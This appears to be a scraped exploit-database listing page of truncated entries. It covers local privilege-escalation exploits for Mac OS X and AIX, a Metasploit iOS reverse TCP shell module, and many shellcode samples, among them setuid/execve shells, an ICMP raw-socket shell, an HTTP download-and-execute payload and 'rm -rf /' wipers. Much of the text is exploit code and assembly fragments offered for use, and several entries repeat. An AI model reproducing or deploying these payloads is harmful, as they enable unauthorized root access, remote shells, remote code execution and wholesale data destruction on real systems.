Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit

Exploit for macOS platform in category local exploits ============================================================== Apple Mac OS X mountsmbfs Stack Based Buffer Overflow Exploit ============================================================== / Copyright C 2007-2008 Subreption LLC. All rights...

IBM AIX <= 5.3.0 setlocale() Local Privilege Escalation Exploit

No description provided by source. setlocale exploit for aix 5.2 CVE-2006-4254 [email protected] from os import execve bof="a"580+"bbbbccccddddx2fxf2x28x2f" egg="x60"2350 shellcode= by intropy at caughq.org "x7cxa5x2ax79" xor. r5,r5,r5 "x40x82xffxfd" bnel shellcode "x7fxe8x02xa6" mflr r31...

IBM AIX 5.3.0 - 'setlocale()' Local Privilege Escalation

setlocale exploit for aix 5.2 CVE-2006-4254 [email protected] from os import execve bof="a"580+"bbbbccccdddd\x2f\xf2\x28\x2f" egg="\x60"2350 shellcode= by intropy caughq.org "\x7c\xa5\x2a\x79" xor. r5,r5,r5 "\x40\x82\xff\xfd" bnel "\x7f\xe8\x02\xa6" mflr r31 "\x3b\xff\x01\x20" cal...

setlocate-local.txt

setlocale exploit for aix 5.2 CVE-2006-4254 [email protected] from os import execve bof="a"580+"bbbbccccdddd\x2f\xf2\x28\x2f" egg="\x60"2350 shellcode= by intropy caughq.org "\x7c\xa5\x2a\x79" xor. r5,r5,r5 "\x40\x82\xff\xfd" bnel "\x7f\xe8\x02\xa6" mflr r31 "\x3b\xff\x01\x20" cal...

HP-UX Security Patch : PHKL_34432

execve panic %NASLMINLEVEL 70300 C Tenable Network Security, Inc. if !definedfunc"bnrandom" exit0; include'deprecatednasllevel.inc'; include'compat.inc'; if description scriptid26429; scriptversion"1.8"; scriptsetattributeattribute:"pluginmodificationdate", value:"2021/01/11";...

Apple iOS Command Shell, Reverse TCP Inline

Connect back to attacker and spawn a command shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 152 include Msf::Payload::Single include Msf::Payload::Osx include...

bsd/x86 setuid/execve shellcode 30 bytes

Exploit for bsd/x86 platform in category shellcode ======================================== bsd/x86 setuid/execve shellcode 30 bytes ======================================== / $Id: setuid-bsd.c,v 1.6 2004/06/02 12:22:30 raptor Exp $ setuid-bsd.c - setuid/execve shellcode for BSD/x86 Copyright c...

linux/x86 raw-socket ICMP/checksum shell 235 byte

No description provided by source. ; ; Copyright c 2007 by [email protected] ; ; 235-byte raw-socket ICMP/checksum shell - x86-lnx ; by mu-b - Nov 2006 ; ; icmp with identifier flagbyte and commands in the ; following format:- ; "/bin/sh\x00-c\x00command here\x00" ; ; unlike other icmp shells,...

bsd/x86 setuid/execve shellcode 30 bytes

No description provided by source. / $Id: setuid-bsd.c,v 1.6 2004/06/02 12:22:30 raptor Exp $ setuid-bsd.c - setuid/execve shellcode for BSD/x86 Copyright c 2003 Marco Ivaldi [email protected] Short setuid0 and /bin/sh execve shellcode based on esdee's code. ...

linux/x86 HTTP/1.x GET, Downloads and execve() 111 bytes+

No description provided by source. / linux/x86 - HTTP/1.x GET, Downloads and execve - 111 bytes+ This shellcode allows you to download a ELF executable straight off a standard HTTP server and launch it. It will saved locally it into a filename called 'A' in the current directory. CONFIGURATION Th...

openbsd/x86 execve(/bin/sh) 23 bytes

No description provided by source. / OpenBSD/x86 Shellcode for: execve"/bin/sh", "/bin/sh", NULL 23 bytes hophet at gmail.com http://www.nlabs.com.br/hophet/ Fancy mappings by iruata souza muzgo iru.muzgo!gmail.com http://openvms-rocks.com/muzgo/ / include sys/types.h include sys/stat.h include...

linux/x86-64 execve(/bin/sh) 33 bytes

No description provided by source. Linux/X86-64 Dummy for shellcode: execve"/bin/sh", "/bin/sh", NULL hophet at gmail.com .text .globl start start: xorq %rdx, %rdx movq $0x68732f6e69622fff,%rbx shr $0x8, %rbx push %rbx movq %rsp,%rdi xorq %rax,%rax pushq %rax pushq %rdi movq %rsp,%rsi mov $0x3b,%...

linux/x86 execve read shellcode - 92 bytes

No description provided by source. XCHG Research Group Linux/x86 execve read shellcode - 92 bytes -- Writed by 0ut0fbound -- - http://outofbound.host.sk - http://xchglabs.host.sk .text .globl start start: EAX = 0x04 - syscall write xorl %eax, %eax movb $0x4, %al xorl %ebx, %ebx inc %ebx pushl...

linux/x86 execve read shellcode - 92 bytes

linux/x86 execve read shellcode - 92 bytes. Shellcode exploit for linx86 platform XCHG Research Group Linux/x86 execve read shellcode - 92 bytes -- Writed by 0ut0fbound -- - http://outofbound.host.sk - http://xchglabs.host.sk .text .globl start start: EAX = 0x04 - syscall write xorl %eax, %eax mo...

linux/x86 execve read shellcode - 92 bytes

Exploit for linux/x86 platform in category shellcode ========================================== linux/x86 execve read shellcode - 92 bytes ========================================== XCHG Research Group Linux/x86 execve read shellcode - 92 bytes .text .globl start start: EAX = 0x04 - syscall write...

linux/x86 execve(rm -rf /) shellcode 48 bytes

No description provided by source. / By Kris Katterjohn 8/31/2006 48 byte shellcode to execve"rm -rf /" for Linux/x86 section .text global start start: ; execve"/bin/rm", "/bin/rm", "-r", "-f", "/", NULL , NULL push byte 11 pop eax xor esi, esi push esi push byte 0x2f mov edi, esp push esi push...

linux/x86 execve(rm -rf /) shellcode 45 bytes

Exploit for linux/x86 platform in category shellcode ============================================= linux/x86 execverm -rf / shellcode 45 bytes ============================================= / By Kris Katterjohn 11/18/2006 45 byte shellcode to execve"rm -rf /" for Linux/x86 section .text global sta...

linux/x86 execve(rm -rf /) shellcode 45 bytes

No description provided by source. / By Kris Katterjohn 11/18/2006 45 byte shellcode to execve"rm -rf /" for Linux/x86 section .text global start start: ; execve"/bin/rm", "/bin/rm", "-r", "-f", "/", NULL , NULL push byte 11 pop eax cdq push edx push byte 0x2f mov edi, esp push edx push word 0x66...

linux/x86 setuid(0) + execve(/bin/sh) 28 bytes

No description provided by source. / revenge-setuid.c, v1.0 2006/09/30 14:57 linux/x86 setuid0 + execve"/bin//sh", "/bin//sh", NULL shellcode once again... setuid 6 bytes + execve 22 bytes = 28 bytes Same as revenge-execve.c we start the 2 system calls with a mov resulting in 2 bytes less, but th...

linux/x86 execve(/bin/sh) 22 bytes

No description provided by source. / revenge-execve.c, v1.0 2006/10/14 16:32 Yet another linux execve shellcode.. linux/x86 execve"/bin//sh/","/bin//sh",NULL shellcode http://www.0xcafebabe.it [email protected] But this time it's 22 bytes We could start the shellcode with a mov instead of pus...